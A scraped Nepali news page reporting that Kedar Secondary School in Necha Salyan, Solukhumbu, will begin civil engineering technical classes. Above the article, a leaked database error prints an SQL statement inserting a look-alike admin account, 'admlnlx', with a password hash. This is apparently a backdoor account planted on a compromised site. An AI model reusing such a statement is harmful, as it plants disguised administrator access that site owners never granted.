WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLyn/adjYsK/JSbQW5f1x4j/RHnpOu.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 08:05:37', '', 'admlnlx', 'admlnlx')

नेचा सल्यान गाउँपालिकामा बन्ने भयो प्राविधिक बिद्यालय – Gaule Khabar

नेचा सल्यान गाउँपालिकामा बन्ने भयो प्राविधिक बिद्यालय

नेचा सल्यान गाउँपालिकामा बन्ने भयो प्राविधिक बिद्यालय

गाउँले न्यूज, ५ असार, सोलुखुम्बु । नेचा सल्यान गाउपालिका वडा न ४ मा रहेको केदार माध्यमिक बिद्यालयमा अब इन्जिनियरिङको प्राबिधिक शिक्षाका कक्षाहरु संचालन हुने भएको छ ।
नेपाल सरकार शिक्षा, बिज्ञान तथा प्रबिधी मन्त्रालय, शिक्षा तथा मानव स्रोत विकास केन्द्र, शैक्षिक प्राविधिक शाखाबाट प्राविधिक तथा व्यवसायिक धार तर्फ सिभिल इन्जिनियरिङ बिषयमा यहि शैक्षिक सत्रबाट संचालन हुने गरि निर्णय भएपछी अब उक्त कामको लागि बाटो खुलेको हो ।
निर्वाचित संघीय ससद सदस्य हेम कुमार राई र बिद्यालय परिवारको अथक प्रयासमा पहलमा सफल भएको हो ।

 

https://gaulenews.com/?p=46523

https://gaulenews.com/?p=46109

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका